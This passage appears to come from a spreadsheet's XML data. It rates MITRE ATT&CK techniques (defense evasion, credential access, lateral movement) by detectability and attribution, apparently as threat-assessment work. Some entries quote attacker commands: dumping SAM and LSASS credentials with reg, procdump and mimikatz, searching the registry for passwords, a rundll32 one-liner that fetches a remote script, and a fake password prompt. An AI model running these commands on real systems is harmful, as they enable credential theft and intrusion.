    <s v="Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools.1_x000a__x000a_Utilities, such as NinjaCopy, exist to perform these actions in PowerShell."/>
    <n v="1"/>
    <s v="Looking for opening of handles to drive volumes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Hidden Files and Directories"/>
    <x v="9"/>
    <s v="To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. _x000a_Users can mark specific files as hidden by using the attrib.exe binary. Simply do attrib +h filename to mark a file or folder as hidden. Similarly, the “+s” marks a file as a system file and the “+r” flag marks the file as read only. Like most windows binaries, the attrib.exe binary provides the ability to apply these changes recursively “/S”."/>
    <n v="3"/>
    <s v="Hidden files can easily be detected by automated tools"/>
    <n v="1"/>
    <s v="File may indicate importance to attacker"/>
    <n v="2"/>
    <s v="File may indicate importance to attacker"/>
  </r>
  <r>
    <s v="Image File Execution Options Injection"/>
    <x v="9"/>
    <s v="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1_x000a__x000a_IFEOs can be set directly via the Registry or in Global Flags via the Gflags tool.2 IFEOs are represented as Debugger Values in the Registry under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/&lt;executable&gt; and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;executable&gt; where &lt;executable&gt; is the binary on which the debugger is attached.1_x000a__x000a_Similar to Process Injection, this value can be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.3 Installing IFEO mechanisms may also provide Persistence via continuous invocation._x000a__x000a_Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Indicator Blocking"/>
    <x v="9"/>
    <s v="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
    <n v="3"/>
    <s v="Lack of information coming from sensor"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Indicator Removal from Tools"/>
    <x v="9"/>
    <s v="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_x000a__x000a_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
    <n v="1"/>
    <s v="N/A"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Indicator Removal on Host"/>
    <x v="9"/>
    <s v="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
    <n v="3"/>
    <s v="Lack of events on system is an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="May disclose target, thus hint to mission"/>
  </r>
  <r>
    <s v="Indirect Command Execution"/>
    <x v="9"/>
    <s v="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Line Interface, Run window, or via scripts.12_x000a__x000a_Adversaries may abuse these utilities for Defense Evasion, specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of cmd."/>
    <n v="1"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Install Root Certificate"/>
    <x v="9"/>
    <s v="Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.1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_x000a__x000a_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2_x000a__x000a_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n v="3"/>
    <s v="Altering of system configuration"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="InstallUtil"/>
    <x v="9"/>
    <s v="InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.1 InstallUtil is located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe. InstallUtil.exe is digitally signed by Microsoft._x000a__x000a_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
    <n v="2"/>
    <s v="Check for unusual parents to processes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Masquerading"/>
    <x v="9"/>
    <s v="Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed._x000a__x000a_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_x000a_In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe.1 An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths.2_x000a__x000a_An example of abuse of trusted locations in Windows would be the C:\Windows\System32 directory. Examples of trusted binary names that can be given to malicious binares include &quot;explorer.exe&quot; and &quot;svchost.exe&quot;."/>
    <n v="2"/>
    <s v="Hash values will not be correct"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Modify Registry"/>
    <x v="9"/>
    <s v="Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution._x000a__x000a_Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification.1 Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples)._x000a__x000a_The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system.2 Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication."/>
    <n v="1"/>
    <s v="Registry setting monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Mshta"/>
    <x v="9"/>
    <s v="Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension .hta.1 HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.2_x000a__x000a_Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code34567_x000a__x000a_Files may be executed by mshta.exe through an inline script: mshta "/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="3"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="1"/>
    <s v="Attacker server may hint towards mission's target"/>
  </r>
  <r>
    <s v="NTFS File Attributes"/>
    <x v="9"/>
    <s v="Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition.1 Within MFT entries are file attributes,2 such as Extended Attributes (EA) and Data [known as Alternative Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).1345_x000a__x000a_Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus."/>
    <n v="1"/>
    <s v="Filesystem altered"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Share Connection Removal"/>
    <x v="9"/>
    <s v="Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the net use \\system\share /delete command.1_x000a__x000a_Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation."/>
    <n v="3"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Obfuscated Files or Information"/>
    <x v="9"/>
    <s v="Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses._x000a__x000a_Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and Deobfuscate/Decode Files or Information for User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.1 Adversaries may also used compressed or archived scripts, such as Javascript._x000a__x000a_Portions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery.2 Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled.3_x000a__x000a_Adversaries may also obfuscate commands executed from payloads or directly via a Command-Line Interface. Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms.456_x000a__x000a_Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding Invoke-PSImage. The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server.7 By the end of 2017, an adversary group used Invoke-PSImage to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary."/>
    <n v="1"/>
    <s v="N/A"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Doppelgänging"/>
    <x v="9"/>
    <s v="Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations.1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2 To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction.3_x000a__x000a_Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10.4_x000a__x000a_Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing,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4_x000a__x000a_Process Doppelgänging is implemented in 4 steps4:_x000a__x000a_Transact – Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction._x000a_Load – Create a shared section of memory and load the malicious executable._x000a_Rollback – Undo changes to original executable, effectively removing malicious code from the file system._x000a_Animate – Create a process from the tainted section of memory and initiate execution."/>
    <n v="2"/>
    <s v="Outdated process for proces invocation can be detected"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Process Hollowing"/>
    <x v="9"/>
    <s v="Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Similar to Process Injection, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis."/>
    <n v="0"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Process Injection"/>
    <x v="9"/>
    <s v="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_x000a_There are multiple approaches to injecting code into a live process. Windows implementations include:1_x000a__x000a_Dynamic-link library (DLL) injection involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread._x000a_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2_x000a_Thread execution hijacking involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended._x000a_Asynchronous Procedure Call (APC) injection involves attaching malicious code to the APC Queue3 of a process's thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing 4 is a variation that utilizes APCs to invoke malicious code previously written to the global atom table.5_x000a_Thread Local Storage (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point."/>
    <n v="0"/>
    <s v="Hard to detect"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Regsvcs/Regasm"/>
    <x v="9"/>
    <s v="Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.12_x000a__x000a_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
    <n v="1"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Regsvr32"/>
    <x v="9"/>
    <s v="Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.1_x000a__x000a_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_x000a__x000a_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2 This variation of the technique is often referred to as a &quot;Squiblydoo&quot; attack and has been used in campaigns targeting governments.34_x000a__x000a_Regsvr32.exe can also be leveraged to register a COM Object used to establish Persistence via Component Object Model Hijacking."/>
    <n v="2"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Rootkit"/>
    <x v="9"/>
    <s v="Rootkits are programs that hide the existence of malware by intercepting (i.e., Hooking) and modifying operating system API calls that supply system information.1 Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a Hypervisor, Master Boot Record, or the System Firmware.2_x000a__x000a_Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. "/>
    <n v="1"/>
    <s v="Rootkit detectors monitor for this"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Rundll32"/>
    <x v="9"/>
    <s v="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_x000a__x000a_Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.1_x000a__x000a_Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot; This behavior has been seen used by malware such as Poweliks."/>
    <n v="2"/>
    <s v="Process monitoring"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Scripting"/>
    <x v="9"/>
    <s v="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n v="3"/>
    <s v="Process monitoring and network communications"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Signed Binary Proxy Execution"/>
    <x v="9"/>
    <s v="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n v="3"/>
    <s v="Commands run"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="1"/>
    <s v="Process spawned might hint to mission"/>
  </r>
  <r>
    <s v="Software Packing"/>
    <x v="9"/>
    <s v="Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory._x000a__x000a_Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available,1 but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses."/>
    <n v="0"/>
    <s v="No artefacts generated"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Space after Filename"/>
    <x v="9"/>
    <s v="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quot;evil.txt &quot; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed."/>
    <n v="3"/>
    <s v="Obvious detection method"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Timestomp"/>
    <x v="9"/>
    <s v="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
    <n v="2"/>
    <s v="Abnormal timestamps"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Account Manipulation"/>
    <x v="10"/>
    <s v="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In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain."/>
    <n v="3"/>
    <s v="Tools may be used that are known bad"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Brute Force"/>
    <x v="10"/>
    <s v="Adversaries may use brute force techniques to attempt access to accounts when passwords are unknown or when password hashes are obtained._x000a__x000a_Credential Dumping to obtain password hashes may only get an adversary so far when Pass the Hash is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table. Cracking hashes is usually done on adversary-controlled systems outside of the target network.1_x000a__x000a_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2_x000a__x000a_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
    <n v="3"/>
    <s v="Very noisy"/>
    <n v="2"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Credential Dumping"/>
    <x v="10"/>
    <s v="Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information._x000a__x000a_Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well._x000a__x000a_SAM (Security Accounts Manager)_x000a_The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.   A number of tools can be used to retrieve the SAM file through in-memory techniques:_x000a__x000a_pwdumpx.exe_x000a_gsecdump_x000a_Mimikatz_x000a_secretsdump.py_x000a_Alternatively, the SAM can be extracted from the Registry with Reg:_x000a__x000a_reg save HKLM\sam sam_x000a_reg save HKLM\system system_x000a_Creddump7 can then be used to process the SAM database locally to retrieve hashes.1_x000a__x000a_Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+._x000a__x000a_Cached Credentials_x000a_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_x000a__x000a_pwdumpx.exe_x000a_gsecdump_x000a_Mimikatz_x000a_Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials._x000a__x000a_Notes: Cached credentials for Windows Vista are derived using PBKDF2._x000a__x000a_Local Security Authority (LSA) Secrets_x000a_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_x000a__x000a_pwdumpx.exe_x000a_gsecdump_x000a_Mimikatz_x000a_secretsdump.py_x000a_Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials._x000a__x000a_Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation._x000a__x000a_NTDS from Domain Controller_x000a_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2_x000a__x000a_The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.  _x000a__x000a_Volume Shadow Copy_x000a_secretsdump.py_x000a_Using the in-built Windows tool, ntdsutil.exe_x000a_Invoke-NinjaCopy_x000a_Group Policy Preference (GPP) Files_x000a_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34   The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:  _x000a__x000a_Metasploit’s post exploitation module: &quot;post/windows/gather/credentials/gpp&quot;_x000a_Get-GPPPassword5_x000a_gpprefdecrypt.py_x000a_  Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s *.xml_x000a__x000a_Service Principle Names (SPNs)_x000a_See Kerberoasting._x000a__x000a_Plaintext Credentials_x000a_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_x000a__x000a_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6 Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.7   The following tools can be used to enumerate credentials:  _x000a__x000a_Windows Credential Editor_x000a_Mimikatz_x000a_  As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.   For example, on the target host use procdump:_x000a__x000a_procdump -ma lsass.exe lsass_dump_x000a_  Locally, mimikatz can be run:_x000a__x000a_sekurlsa::Minidump lsassdump.dmp_x000a_sekurlsa::logonPasswords_x000a_DCSync_x000a_DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API)891011 to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data 12 from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in Pass the Ticket13 or change an account's password as noted in Account Manipulation.14 DCSync functionality has been included in the &quot;lsadump&quot; module in Mimikatz.15 Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol."/>
    <n v="2"/>
    <s v="LSA access generates log entries"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Credentials in Files"/>
    <x v="10"/>
    <s v="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_x000a__x000a_It is possible to extract passwords from backups or saved virtual machines through Credential Dumping.1 Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller."/>
    <n v="0"/>
    <s v="Read only access to files. Leaves practically no traces"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Credentials in Registry"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Example commands to find Registry keys related to password information:1_x000a__x000a_Local Machine Hive: reg query HKLM /f password /t REG_SZ /s_x000a_Current User Hive: reg query HKCU /f password /t REG_SZ /s"/>
    <n v="0"/>
    <s v="Read only access to registry. Leaves practically no traces"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation for Credential Access"/>
    <x v="10"/>
    <s v="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12 Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained."/>
    <n v="0"/>
    <s v="Very hard to detect, instability may be an indicator"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Forced Authentication"/>
    <x v="10"/>
    <s v="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1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23_x000a__x000a_Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary,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4 With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials, or reuse it for Pass the Hash.5_x000a__x000a_There are several different ways this can occur.6 Some specifics from in-the-wild use include:_x000a__x000a_A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened. The document can include, for example, a request similar to file[:]//[remote address]/Normal.dotm to trigger the SMB request.7_x000a_A modified .LNK or .SCF file with the icon filename pointing to an external reference such as \\[remote address]\pic.png that will force the system to load the resource when the icon is rendered to repeatedly gather credentials."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="4"/>
    <s v="If no protection used, traces back to attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Input Capture"/>
    <x v="10"/>
    <s v="Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception._x000a__x000a_Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes,1 but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider.2_x000a__x000a_Keylogging is likely to be used to acquire credentials for new access opportunities when Credential Dumping efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises._x000a__x000a_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 and Valid Accounts or as part of the initial compromise by exploitation of the externally facing web service."/>
    <n v="2"/>
    <s v="Multiple indicators up to physical devices"/>
    <n v="3"/>
    <s v="In case of physical device, local presence is needed"/>
    <n v="1"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Input Prompt"/>
    <x v="10"/>
    <s v="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_x000a__x000a_set thePassword to the text returned of (display dialog &quot;AdobeUpdater needs permission to check for updates. Please authenticate.&quot; default answer &quot;&quot;) 1_x000a__x000a_Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite."/>
    <n v="4"/>
    <s v="End-user visible"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Kerberoasting"/>
    <x v="10"/>
    <s v="Service principle names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service1).2345_x000a__x000a_Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).67 Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline Brute Force attacks that may expose plaintext credentials.765_x000a__x000a_This same attack could be executed using service tickets captured from network traffic."/>
    <n v="2"/>
    <s v="Enabling ticket auditing will identify this attack"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="LLMNR/NBT-NS Poisoning"/>
    <x v="10"/>
    <s v="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12_x000a__x000a_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 and crack the hashes offline through Brute Force to obtain the plaintext passwords."/>
    <n v="2"/>
    <s v="Spoofing detection tool makes this visible"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Network Sniffing"/>
    <x v="10"/>
    <s v="Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection._x000a__x000a_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techniques for name service resolution poisoning, such as LLMNR/NBT-NS Poisoning, can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary."/>
    <n v="2"/>
    <s v="Networktraffic may generate IOC's"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Password Filter DLL"/>
    <x v="10"/>
    <s v="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_x000a__x000a_Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation._x000a__x000a_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
    <n v="2"/>
    <s v="Modification of system files"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Two-Factor Authentication Interception"/>
    <x v="10"/>
    <s v="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_x000a__x000a_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1_x000a__x000a_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2_x000a__x000a_Other hardware tokens, such as RSA SecurID, require the adversary to have access to the physical device or the seed and algorithm in addition to the corresponding credentials."/>
    <n v="0"/>
    <s v="Indistinguisable from legitimate traffic"/>
    <n v="2"/>
    <s v="Needs access to second token"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Application Deployment Software"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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n v="3"/>
    <s v="Standard tooling is used, which may lead to logs/audit trails"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Distributed Component Object Model"/>
    <x v="0"/>
    <s v="Windows Distributed Component Object Model (DCOM) is transparent middleware that extends the functionality of Component Object Model (COM)1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_x000a__x000a_Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.234 By default, only Administrators may remotely activate and launch COM objects through DCOM._x000a__x000a_Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications5 as well as other Windows objects that contain insecure methods.67 DCOM can also execute macros in existing documents8 and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application9, bypassing the need for a malicious document."/>
    <n v="1"/>
    <s v="Requires dedicated attention and monitoring "/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Exploitation of Remote Services"/>
    <x v="0"/>
    <s v="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_x000a__x000a_An adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning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_x000a__x000a_There are several well-known vulnerabilities that exist in common services such as SMB1 and RDP2 as well as applications that may be used within internal networks such as MySQL3 and web server services.4_x000a__x000a_Depending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well."/>
    <n v="2"/>
    <s v="Detectable due to IOC's"/>
    <n v="0"/>
    <m/>
    <n v="3"/>
    <s v="Lateral movement may indicate targets of mission"/>
  </r>
  <r>
    <s v="Logon Scripts"/>
    <x v="0"/>
    <s v="Windows allows logon scripts to be run whenever a specific user or group of users log into a system.1 The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server._x000a__x000a_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n v="3"/>
    <s v="Configuration changes"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="2"/>
    <s v="The targets may identify what the mission is about"/>
  </r>
  <r>
    <s v="Pass the Hash"/>
    <x v="0"/>
    <s v="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_x000a__x000a_Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes."/>
    <n v="2"/>
    <s v="NTLM 3 logons without domain login"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
    <n v="0"/>
    <s v="Too generic to tie to mission or attacker"/>
  </r>
  <r>
    <s v="Pass the Ticket"/>
    <x v="0"/>
